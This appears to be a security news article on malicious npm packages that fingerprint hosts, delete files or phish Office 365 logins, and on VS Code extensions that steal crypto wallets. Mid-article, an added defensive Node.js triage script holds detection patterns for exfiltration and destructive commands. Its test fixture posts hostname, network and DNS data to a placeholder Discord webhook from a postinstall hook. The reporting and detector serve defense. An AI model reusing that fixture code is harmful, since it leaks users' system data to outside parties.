Recent investigations have unveiled over 60 malicious npm packages lurking in the package registry, designed to extract sensitive information such as hostnames, IP addresses, DNS servers, and user directories and send it to a Discord-controlled endpoint. These packages were published under three distinct accounts and contain an install-time script that runs during the npm installation process, as reported by Socket security researcher Kirill Boychenko. Collectively, these libraries have been downloaded more than 3,000 times.
According to the software supply chain security firm, the scripts are capable of targeting systems running Windows, macOS, or Linux, incorporating basic checks to evade sandbox environments. This means that any infected workstation or continuous-integration node could become a source of valuable reconnaissance data.
Details on the Malicious Accounts
The three accounts responsible for these harmful packages, which published a total of 20 packages within an 11-day span, have since been removed from npm. The accounts, identified as bbbb335656, cdsfdfafd1232436437, and sdsds656565, distributed malicious code specifically crafted to fingerprint devices upon installation. Furthermore, if the code detects that it is operating in a virtualized environment associated with major cloud providers such as Amazon or Google, it halts execution.
Data Harvesting and Threat Implications
The information gathered includes critical details such as host specifications, DNS server configurations, network interface card (NIC) data, and both internal and external IP addresses, all of which are relayed to a Discord webhook. Boychenko noted that this data collection allows threat actors to map out networks and pinpoint high-value targets for future attacks.
This revelation coincides with the identification of another set of eight malicious npm packages that disguise themselves as helper libraries for popular JavaScript frameworks including React, Vue.js, Vite, and Node.js. These packages, which deploy harmful payloads once installed, have been downloaded over 6,200 times and remain accessible in the repository.
Disguised Dangers in Popular Libraries
Socket security researcher Kush Pandya commented on the situation, indicating that these packages masquerade as legitimate tools while concealing destructive payloads meant to corrupt data, delete critical files, and crash systems. Some of these rogue packages are programmed to execute automatically when invoked in developers’ projects, leading to recursive deletions of files linked to Vue.js, React, and Vite. One particularly concerning package, js-bomb, extends its impact beyond just deleting files by triggering a system shutdown based on the execution time.
Investigations suggest that the threat actor known as xuxingfeng is behind these malicious publications, having also released five legitimate packages. This dual strategy of offering both harmful and non-harmful packages creates an illusion of trustworthiness, increasing the likelihood of users installing the malicious versions.
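As an added example (my own code, not the article's or Socket's), the following Node.js triage check illustrates what a defender can do before installing a package: it flags the install-time lifecycle hooks that the fingerprinting packages relied on and scans the package's files for the behaviours reported above (hostname, NIC and DNS-server collection, Discord webhook exfiltration, and the recursive deletion and shutdown commands of the destructive packages). The indicator names and the sample package contents are constructed assumptions, not real package code.

```javascript
// Added example, not code from the article or from Socket: a static
// pre-install triage check that flags install-time lifecycle hooks and
// the fingerprinting, webhook-exfiltration and file-deletion indicators
// described above. All inputs are constructed samples, not real packages.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicator labels are my own; patterns match the reported behaviours.
const INDICATORS = [
  { id: 'discord-webhook', re: /discord(?:app)?\.com\/api\/webhooks/i },
  { id: 'host-fingerprint', re: /\bos\.(?:hostname|homedir|networkInterfaces)\s*\(/ },
  { id: 'dns-servers', re: /\bdns\.getServers\s*\(/ },
  { id: 'recursive-delete', re: /\b(?:rmSync|rm|rmdirSync|rmdir)\s*\([^)]*recursive\s*:\s*true/ },
  { id: 'shutdown-command', re: /\b(?:shutdown|poweroff)\b\s+[-/]/i },
];
// Exfiltration or destruction combined with an install hook is blocked.
const HARMFUL = new Set(['discord-webhook', 'recursive-delete', 'shutdown-command']);

// manifest: parsed package.json; files: { relativePath: sourceText }
function triagePackage(manifest, files) {
  const scripts = manifest.scripts || {};
  const hooks = LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string');
  const findings = [];
  for (const [file, body] of Object.entries(files)) {
    for (const ind of INDICATORS) {
      if (ind.re.test(body)) findings.push({ file, indicator: ind.id });
    }
  }
  const harmful = findings.some((f) => HARMFUL.has(f.indicator));
  // Hooks alone are common in legitimate packages (native builds), so
  // they only trigger review; hooks plus a harmful indicator are blocked.
  let verdict = 'clean';
  if (harmful) verdict = hooks.length ? 'block' : 'review';
  else if (hooks.length || findings.length) verdict = 'review';
  return { hooks, findings, verdict };
}

// Constructed fixture mirroring the reported fingerprinting behaviour.
const SAMPLE_MANIFEST = { name: 'sample-pkg', scripts: { postinstall: 'node setup.js' } };
const SAMPLE_FILES = {
  'setup.js': [
    "const os = require('os'), dns = require('dns');",
    "const info = { host: os.hostname(), nics: os.networkInterfaces(), dns: dns.getServers() };",
    "fetch('https://discord.com/api/webhooks/PLACEHOLDER', { method: 'POST', body: JSON.stringify(info) });",
  ].join('\n'),
};
const BENIGN_MANIFEST = { name: 'sample-lib', scripts: { test: 'node test.js' } };
const BENIGN_FILES = { 'index.js': 'module.exports = (a, b) => a + b;' };
```

In practice the manifest and file map would be read from the unpacked tarball (`npm pack`) before any `npm install` runs, so no lifecycle script executes during the check.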
Phishing Campaigns and Advanced Techniques
Additionally, there has been a recent discovery of a sophisticated attack campaign that merges conventional email phishing tactics with JavaScript code embedded in a malicious npm package, camouflaged as a benign open-source library. According to Fortra researcher Israel Cerda, the attack begins with a phishing email that contains a malicious .HTM file, which holds encrypted JavaScript code linked to a now-removed npm package named citiycar8.
Once this package is installed, the embedded JavaScript initiates a URL redirection that ultimately leads users to a fraudulent Office 365 login page crafted to steal their credentials. Cerda highlighted that the attack showcases a high degree of sophistication, utilizing technologies such as AES encryption and npm packages delivered through a content delivery network (CDN), as well as multiple redirections to obscure malicious intents.
Growing Threat of Open-Source Repository Abuse
The exploitation of open-source repositories for malware distribution has become a common method for executing large-scale supply chain attacks. Recently, malicious data-stealing extensions were uncovered in Microsoft’s Visual Studio Code (VS Code) Marketplace, specifically targeting Solidity developers on Windows to extract cryptocurrency wallet credentials. Datadog Security Research attributes this activity to a threat actor known as MUT-9332.
The problematic extensions, named solaibot, among-eth, and blankebesxstnion, were presented as legitimate tools, hiding harmful code within functional features while utilizing command and control domains that seemed relevant to Solidity and would typically go unnoticed. These extensions employ intricate infection chains involving multiple layers of obfuscated malware, including one variant that hides its payload within an image file hosted on the Internet Archive.
Conclusion on Security Concerns and Future Implications
Although these extensions provided genuine features for Solidity developers, they were also engineered to deliver malicious payloads capable of stealing cryptocurrency wallet credentials from affected Windows systems. All three extensions have since been removed from the marketplace. The ultimate objective of these malicious VS Code extensions is to implant a harmful Chromium-based browser extension designed to extract Ethereum wallet information and transmit it to a command-and-control endpoint. Moreover, they can install an additional executable that disables Windows Defender, scans directories for Discord, Chromium browsers, cryptocurrency wallets, and Electron applications, and retrieves further payloads from remote servers.
Datadog researchers have also linked MUT-9332 to a recent campaign involving 10 malicious VS Code extensions intended to deploy an XMRig cryptominer while masquerading as coding or artificial intelligence tools. “This campaign highlights the lengths to which MUT-9332 will go to conceal malicious activities,” Datadog noted, suggesting that the detection and removal of this first wave of malicious extensions may lead to changes in tactics for future campaigns.